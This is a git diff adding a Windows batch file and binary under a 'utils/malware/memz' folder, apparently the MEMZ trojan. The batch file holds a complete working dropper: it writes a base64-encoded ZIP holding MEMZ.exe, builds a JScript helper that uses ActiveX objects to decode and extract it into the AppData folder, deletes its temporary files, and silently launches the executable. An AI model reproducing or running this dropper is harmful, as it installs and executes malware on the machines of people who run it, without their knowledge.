diff --git a/utils/malware/memz/MEMZ-Clean.bat b/utils/malware/memz/MEMZ-Clean.bat new file mode 100644 index 0000000..839e1cd --- /dev/null +++ b/utils/malware/memz/MEMZ-Clean.bat @@ -0,0 +1,122 @@ +@echo off + +echo UEsDBBQAAAAIAIx46kjizcik+BYAAAAyAAAIAAAATUVNWi5leGXtWnt0XMV5Hz3sCCNba6Klgjjk>x +echo AnJkWD3uvmQ9rLCytLINkr3WypLBlu2r3bvau7p77+Y+JMvYxiDMQV2UcloSoMenAey2bkoS0hJq>>x +echo khwqHsFOYlJwKBgwgdM6PUvs5CiUEyuJwvY3c+/qgR/yH+k5PU2u9O3MfPPN95pvvpnZux13PEgK>>x +echo CCGFgGyWkCPEegJk/uckYMnnvrOEPH3FK9cfyWt/5fquuKRzKU3t14QkFxEURTW4PpHTTIWTFK51>>x +echo Q5hLqlGxevHiReU2j2ciyYYP8wukHPxu14PS71k9X/oRyh1bF8bPsXJK+m9W5sVp2SlF4pT+YrqF>>x +echo goS05y0gb625pyeHe5/k512ZtwRKo8FZuJ9dhQ9Hrh2w6vmELCB5rD9XkpTtJNYd2M8IKe10OV2w>>x +echo p5wn5DGmCOTmX0DBHYR8RFnXEFI3v6tnHqpn3sW7qw1xp4HSWWwrtGRG71ksdlRrUcEQCHnaafO8>>x +echo GnDVXLoA/qstMrIi30IwXivOoxuv1nQtQmxbQzZd5QX4aaKsRmzbdxDma8KfR7f64hb+6flDPpvS>>x +echo Zzd2p82iseBUqDvr3M0FyP5xg8s6N6NWH5wynY3+0tUBYixOEPw5QHMSPd7xwLb0z3pfKKIM0sHi>>x +echo kbOB7p6RyYVmaTroOHfyM+M3BosOLsO4DzZjokcm882iBMk66zC0aSkwJfu/AuEjexyo1aKd3lPq>>x +echo /XV3d3wC2B5LxMhkXsn+a2nfy6NBR/2C1ysDpOS+K4AIf/d0AMrdeda8ZV8jMRsw7lcz4xK+eNHN>>x +echo ARJ34CNrFmWdMmO20CzpTuTNJoSmgZEXOTBvZMy1r2/54GtUq8mSkv1/i8pYcDzEOBwBddZfBnPS>>x +echo kxhchua+piI0ydGg45ArQMxPofI0KmNBh/fXoTiN/rFgaQiaHQM2TpYjuzpXUTZmadbZRaX7OXyG>>x +echo HqeSgXwtMzC+YmR8YSixqCf7BsMyVKI5HkJ9ZPxqq2dap31sFs44KEPTYeFeB247mxcHnZeRs45w>>x +echo d0+66SXqlc9k30w4YumJ7Jux/RN7NFv/kofGn6CVe8dNd9ZpgHCsY2JjKOs8hGocWY6waYfyGcoE>>x +echo ljigrnMnGmeWJRawLhYfFsGZokQ06/SdJ2935oySCAOzlGHQcSPreHlPj62Isd77Tv1nqdmDrc+d>>x +echo DASYVBYO2cHJ6YAwl6WXpNum8toKE3nZwcKx5ryNowuz3RMjLxWPtk21jLzMNTIe2vOJRZYeHxRk>>x +echo s1n44u6zdGcLd6f949Rx7/SEs28k8g4WU9XfOOhgFhRT8/evxYDRz9LYDSW2JpZmnZV0nrLOZaw3>>x +echo it5QyTP7I3bZZ5eCXe6wy+12uc0ue+1yKy2z396MIvvtLvYZYp/t7JMKzzpLIeogDbd/feQmGlPj>>x +echo R4PjNEeGjgaPNWMCRvdkjgZfotv2aO/x0d5XR3tfH+09Odp76mjwfQfDnh7tPZt1vgo+LJSeI+SH>>x +echo VjyFu0d7J44GJ79Bl+X4zaO9H40Gp8aCEzAwDupwOOtsp/aGw+nglCv4USgdnHShO+FJeLrjT0Ed>>x +echo eM55nCYH5un079KfpZNzkAZByX2PQfpzr1rT91vwTFFe6aOPul54bTIXKjSqr4sfoyttfBE6l0OV>>x +echo fcML1o4c+zggjZ+YxtM0gnXzcXZBQaggFMoOTsUnbwqwYKTyEQFsSY4uTPCh7E+8Pxhrm9y4MRT/>>x +echo 1bUBsnFj1hmixlN5a2hYNLH0cY8I9+YGsmGJBbn4PcYWuVX/HouRcDgcf2up5ZQQW7JnaYxXPk6D>>x +echo A1myZKzjEF0rEyxpmqVjwUNovU/jhNVOMYeGWeON/eN3Hd2+zTu+BcvzRZp1N+5D9jMrEotopGeO>>x +echo LyDEe+Kcn1wP+b4vE7gwHqq2rN0BPpl/BMGjz1KvnfvN6CbHO0HHu72T7wYn3wkWWZVT/mOgP7Xg>>x +echo MfrZNMHqJ/H50+czNy5EFp0jdgsSw1hwEko+xjJh8bOPFIH/ud+MpfIzASrq3Mfp32Zq7dqHmUrU>>x +echo EgWPbjn3u1tLvvlmwaapzsw1rJO23yjYNNmZdR5g6WdLIn+zLQwJiElb191jJReWPh+klQkacz1W>>x +echo nkGkeX+AWIsXES+mrjsXc6hmneUgoMMfYswT0c1zDbnaOx4KheJ3XEuzLGI/ZE1VZjcycOK6R2+/>>x +echo mLMWPzLLWZOs/qrlrF8XTjuLSShFHsq/lkaFYSWC0zT4PJtnKK5L5GEGFxVaM1hozeCRAB0ySXWZ>>x +echo wEpNlFJdxgqX2o7h9rG97zBLSjnvnAxjPVoOwq40Fnw/FLY8lPk6WKQ7MiPPH3iUWjSZOcAQZ3OI>>x +echo qUx6NkX67cydswkwlQMFNH4259P4wXxundWMc+Q4lnW61xHu7M6aU1lzMmw5Ppw1P8q5fgtz3sS7>>x +echo wYlT/iOznPc+qx/GZ+a7BdOuGzm7zIrvo8HT9KiXOQNRiZtvhzKJZWPB0yMv8KFEXmx0UybrvJ9a>>x +echo +KN8qtCDeVShsXsq82ZxKmOcOi4YRJmZIPoo3THBTAltpEuqe2T8QGis+YCVurLOFXMCadayOd+Y>>x +echo p6gxv8yfpYLDmq4fzNpDehJXZt9AYktPJopfy1rVidc+tsME82creXJmncXz7iJsRT/N0iIS7Mss>>x +echo 1o+mmx5gSTf7ZuZFWA7l0hM5X2egzFuZU8+/u2CcBuiHCNEwVe1Y+mU4c/8J8+Z4Adh22lwz9+TR>>x +echo ZdlEt7TOjGk16DbXCe6YT8f0fM6s0+44PXMnAlnnWrbLJ6KJ/PQEsBywi9nR4l7rYPiZ7kwSLG+3>>x +echo aLpRFE93w8et9tGQHgzRDFCFsHwexvJBonUepj7gsUrjm2FKfAfLbzgQOB+xhj/Jhm97oZCdXvYU>>x +echo FfSk9zjM+nD6c+daoEpgn1HZnXkCc5BeTC1y3Vb6KAvmv2AoB0M56HrQl42Gy7Zt6cmaVD3q8aeo>>x +echo zb0vFFPO9Lzb483mTh7NPT32QaNo5qBRmV5fhuPFaFtZ4/ri3dek1zt6soOl7MDR5shezQ4cxaN7>>x +echo y7JtpWeuGN1bOrrXMbq3OHfqOHOQZqjHObZPmMvjEDORyEOe4tj2QqwNowg7ETsSM8KxjqmNiUJE>>x +echo SqGVEpdjq7orl+yoyt3WwRHa7Q15T6wN96QnsXen396f3XtNLF24t+RfirfFRgu3tcRGi/duaHxv>>x +echo 98/BZf/43usTi7YnFt8eq1/VbTpi9e3d+eYVIOmOje7uzl/d+Orun23fQg+NL76ztXwq3Vo+9eIf>>x +echo 6G7xp+f//tPgR+rwW/WlOIfR8sc+Qn4J+BhQjL4ywA2AUz6LbtJNyNsA4iFkPSAA8ACuA2SAvwrl>>x +echo S26LVrN5J7yE7AU8APgbwD8BxgFfAEwAFoL3VYDrAJWAOkAboBtwB/p3ofwS4BDgGQAPHAcoBnwM>>x +echo eROAnwJ+CDgCOAx4CLAPEAP9raDTUD/ltfT5kq1XNYAepOOGkWqoqelX1X5ZrI6o1ZGBGl0UtEj8>>x +echo li829Ym64RoShl2G6hqQZNk1rJqaLsqxecbF1SGXx6WJSXVQdAmuQUkz9flkJSNCTBRdg7pLUTVD>>x +echo VeajpzKgli4q0ZwI2k4Ou2KaBOS88iRFjGhCzHDFhZ2uqDqkyKoQhfBpdS9Lfr9ouJKqIg7P60tV>>x +echo 2SW5+sxodHhGWkwTxcvyZZ857BoSxehl6RRRo9Nud0kKKropyK4+QZciufi/JJ+huEDdkkqJChjE>>x +echo 6LS7oqIsGqJLH9YNMen1zMuj32u4NO+AMa9fBCMSt3XN+WW+MYy6Wtw5n+8kxRA1BTMk7kzJqiZq>>x +echo LglBEhddLLD7NHVIF7XL8EdMiIh9qjoAn0QGJKUfTlZlNnnnB45rSNUYjYd3116OHZhbSY5CN1ns>>x +echo l4y5XC8vBiOaKGBq6OJ0YaBLExRdTQ4J2uXEFsbbCzUpJne5DE1NCMplrgEstoiaTJmG5dmoSu0e>>x +echo EiUtCi+jDmcYMdpjxRJCMSXvQkNOXZpvVFAGmDqXp//0HFhD5hkjyDGXLMVElxeGy6Kgw91w33zj>>x +echo YAUyoIm0IRgSRgry/HGDxGAI/aIrJWgqln1SYIFhvyewAuSS42moslnBVNoiL0mvG3Ac0gv7TArD>>x +echo +NcvZ70n1LjiioiK4EpKUckOREU1MLvKoKgZ8+WdQeRSXTAjTFsRo2RZjBgSTeKX1ndAg0/FnS49>>x +echo gk1GVXQaSIg+RQIrPaVJhqgzlab5ILKHRE2vTkoRTdXVmAGWyRpRqTL1GvjVgNiamKqZyVxruwon>>x +echo alW5lk5fzmASaqhbq5KCTFcJC/YqK/KraEDTTCcPV0WRJTR1mJJ7auv6Iu6Ip8pbH/NV+Tyxuqp6>>x +echo Hk1//UqhdqW3r7bP55/t5yQT26cKWrR6ENYwNTGD0Zohmu+qsDz0nPgqw9SUKqEqt5SqkLZUtKMS>>x +echo pkGQq+KiLEPvlDiLf0oWhqsjstmHZdVvSgrlP90XUVOGlJR2iRrMZj3T46jLVLiXYSOCzPYDzLSY>>x +echo QrKJJKNkiDqdnl/EfjEqGSSXOSmdIegDyX6NJHXERUzqp7iknhKgL4mKg8n+pFGNPoJe+E0myWSE>>x +echo hNl+sVagG7JV32jCrSw2rHZwZ0QWkoKFIh0kCLiDhIhAFCIS2Y7fHJ4jLcCJrJcj3ahpRCcSUVm7>>x +echo CkBHDoNGRRm12zOcVpNNpAt/G8h6i2+w4w5aWm/whGGaRzhUYYMuISuLUU4Xk1JVXNCSMVOuXryI>>x +echo USZFRGIlJxmcHldNOUrf9uk4wHCGypm6WMn1mQZ9EcjBVFlGDUiOvlLiZFXXOVXjWIBwVprkkLq5>>x +echo pNQfNzj65nBIUAwIWrxoXYz1xIVBkb5djJpYVIM2H1WhfRpnbciUoy71K1BXUqgSqiJjUXJCJKKa>>x +echo imGpCr01EROfxPEIhKCiLyiNOZYzqzmBw5owcGjgkkIkThmBq6pFqcYqVBEHRcXgUogbxZBANcey>>x +echo SFxQ+in/S9rWqrIeyz8USzkjBfXJEGbcQuckiDlqxoy1o9aKditZR8JzMOQTs61jvgVEhIgyQkzU>>x +echo aF0hBiiGgVtO3Dj50pigeJ3Rh8la8G1DTLjANYz44kCv2p/9+JMZPwGljDL1CYnX23rMcGwBr07o>>x +echo 6JrDOzzNVycDiNgUq6kkybgbwFi1FSgFUIiM1wzFJ+VyJIaajpF0DdwEHRYBNoBOZGtBY3EfZeM5>>x +echo MgRsH1spBuNcAzqN2UfpkoTuE51zRlj+o/I1tJIoBzEyafuTnEdPNR6GDJXNAF15EnpT4GKcRyuy>>x +echo mbE4Uwkm66M6tMFCalWcje5n/RHmWyqX5gHLywL6qFeovJ0MR+OD2jL0Cf4SxtPsoNs6i8wOapnl>>x +echo dxHjLXu6mB5WrqA8YvgTMZr2hmdpwbGYoJ6MQE9LtopETHnQ+ZEZPZ1RK2JM5nfLGoNZpjP/Ul9Y>>x +echo /qH63DLrdjpuNybssihglQ67LLXLcrustkufXd5ul5JVBu6yytTDdvurrMz9RmAx4Cygjr6Tt8J5>>x +echo um8Jmfusaelqp9830/fs7J17eZLZnXs/Xy3RXFBubYbgVQcGuXfulD+VY7XLd+3aFe2jmwj9zcAD>>x +echo ZHosu1s8BVzpDI7dXl/i58hgt3J636bfM9u4Wss+3I/zgbPf4RevJmQZ5dWnW0EQsl7Bs3f35Ty7>>x +echo se8Abl/+NI7pMDnr/XwUGB9srHTP4F6ABnHgTs6i42F5KWfrmhvrt/xTPmvsPcDtAO57s3AHgJsE>>x +echo 7tVZY/8OuGKOXPD5Y/8O4/m8NaLRYmoadqGQpkZEXV8XJdfkBXdKuTb5Nmlht6OuOD19QffCsCyK>>x +echo KbItr03VcOroABGO6Ij19QtkHPdkUUG9LB+cO7DhyiI9usi0/5/z18hqnyA3y/SHHN+xW23sBv/9>>x +echo WZpYkqAIuS3YuT7Y7vVUR2WkhF5KMy1uKr+LXtNkqGbjCPkmaZVwnML5cEar3flh7NYz7QOkVYz1>>x +echo SAruPNREYDryO3Fep0fnFlnQ9eBO4BTbaouQot7LD+O2ZLUJaaK63CYOhw1689lLW9ZhrEM0NCmC>>x +echo VbK0YFMqOs2B5oHVkKKE2GGPnCJBJWrXb4X8qCZM8z5AuVmNThy5ST5pjiZMfTaKLMm3LVqt7mwm>>x +echo X5kZ0a4q/dD/RoppFfUBQ03l+H4ImWbSaunk0MwYy+EzAUBeyVunt+JYovbP+O3O2X7skpKiaho9>>x +echo ZJBh1yk4d5OjpBVWrIvQY+hfznBvbSEiLGQXRdSdszTvIX+O8XTedVULqfAaZ8dBrv0e07kljgt+>>x +echo TnHyb3SM3VqrqgNswgo2KXHU56CRs1oEWV6PJGsjyC/y2nFKozr2kE3hYGcutprt+W7DybuHLKbR>>x +echo GzbUyMCGvgTz9xBk0itZrv17qqfVgPBn87sgYwN1CPk0WS0Zq2WDxnvY0EQEI2utaV1nC/sWZA2n>>x +echo jObIF01JE1sgEYMx8nkLv0ZUOrFk6KWjubW7OZQbRq7LC9ObTHCnGMEtp5mE1wbbc4ujiIRwoQnj>>x +echo qBptJqRn3fqODoZv2dCB/SbH4Q/5FF0fIAGAATgEOA0ovyFAugAPAI4AyI0B0gqQAY8BjgEc2HLj>>x +echo gMOADGDF8gDZBzgMOAUo/XyArAXcDzgCmADwFRgDeAqweQXwgNcBE4DCmwKkGFAKKANwgBUAH2AV>>x +echo YC0gBNgKiALiAANwL4A+g84AOVkZuKidv0B/adWF++n7yU1lsPEi/fRZ9WcBkrrE+DuuDpBHLtH/>>x +echo DPqPXKL/hmvgi0v0Xwv5k5fQ76vQv7T6wv10vI7x/CX6L/GTwj89fzRPHinDZ5l9hpqNp/HBXwB/>>x +echo RSHB3c46N+69wO9cV92yMylzg6KmS6rSVOGu5itwu42oUdyJmyo2dbVV1VVw9Pu6KPYpRWyqGBb1>>x +echo ilu+sHjRKuzhYrJPHubAQNGbKkxNadAjcTEp6FXTX3vRL4saBD1ZPeiuwB1dkWKibnTPlgZWHLfK>>x +echo 0LDzrlNiqs3thnm4eW9g4zBSR5rWJGPYbgOjiV+kX92I2GqlQUkW+0V9unN2t5XhoUi7OCjKnEw/>>x +echo myoEfZ0yqA6IWgVnSs0Rulc3VcQEWRcruJoZITUXl7KqZo5Oq2qmjbPaUTFFv9hQIjmdpzFGs+3T>>x +echo GTk5L6+j3WDJGcMpzMKQpHg9FZwiJNHomP6S0d6Xq1vUZFJVqlqsL7j0ipkJrq3m6V8F/Z6G2qZq>>x +echo zVokLtEvHU0NvG5Gj9knSxGcurrgBjrEX+/vq/W5fb5IJOaOxio4WVD6TZwtGHnNtNkXNmMGzwxe>>x +echo VSPM9P6vLJL/Xw/usDvoD3L5a/hy3stv5RX+K/zX+Gf4H/P/zr/N/yd/jv+Ue7nb5fa5G9yr3be5>>x +echo BbfsNt13uu92P+w+6H7W/Yr7tPu37gLPYk+Z5yYP76n1tHpu9XR5Rjxf8nzZ8/eeE55Tng89Wc9C>>x +echo b7G3zHuj92bvl71/7f2q91ved73/4b3S92lfta/Wt8rX6lvn6/Jt96m+b/ie8T3nO+F72/ee7wPf>>x +echo OV+hf5Hf4b/az/lX+Kv9fn+rv9O/1f+g/2H/Af8h/3H/Cf9J/0/9ebXttYlavXZf7eO1/1B7tPYn>>x +echo tb+pzdYuWHnlys+vrFzpXdm58vaV21fev/KhlU+svLauvK62blXd6rq1dffWfbPuSN33635e92Fd>>x +echo Qf0V9SX1zvra+nB9b71UP1h/f/0T9U/WH69/q/6/6j+qL2lY0bCmYX1Db4PYkGwYatjdcF/DWMOR>>x +echo hh81ZBp+3+Bo7GzsbVQbzca7G+9r/KvGbzQSdgd/iPqZL+SL+GLewZfyZfwynoO3V/CVPM/7+Dp+>>x +echo FR/gW/m1fDsf4rv4zZiFHXyUj/Myn+INfie/m9/H38vfzz/AP8g/xD/CH+Af4w/xh/kn+af4p/kj>>x +echo /Pf4cf4Yf5zP8Gf5Inexe4W70r3W3e6OY67udz/gPux+0n3MfdydcZ91z53+/wFQSwECFAAUAAAA>>x +echo CACMeOpI4s3IpPgWAAAAMgAACAAAAAAAAAAAAAAA/4EAAAAATUVNWi5leGVQSwUGAAAAAAEAAQA2>>x +echo AAAAHhcAAAAA>>x + +echo f=new ActiveXObject(^"Scripting.FileSystemObject^");i=f.getFile(^"x^").openAsTextStream();>x.js +echo x=new ActiveXObject(^"MSXml2.DOMDocument^").createElement(^"Base64Data^");x.dataType=^"bin.base64^";>>x.js +echo x.text=i.readAll();o=new ActiveXObject(^"ADODB.Stream^");o.type=1;o.open();o.write(x.nodeTypedValue);>>x.js +echo z=f.getAbsolutePathName(^"z.zip^");o.saveToFile(z);s=new ActiveXObject(^"Shell.Application^");>>x.js +echo s.namespace(26).copyHere(s.namespace(z).items());o.close();i.close();>>x.js + +set v="%appdata%\MEMZ.exe" +del %v% >NUL 2>NUL +cscript x.js >NUL 2>NUL +del x.js >NUL 2>NUL +del z.zip >NUL 2>NUL +del x >NUL 2>NUL +start "" %v% \ No newline at end of file diff --git a/utils/malware/memz/MEMZ-Clean.exe b/utils/malware/memz/MEMZ-Clean.exe new file mode 100644 index 0000000..a2093f3 Binary files /dev/null and b/utils/malware/memz/MEMZ-Clean.exe differ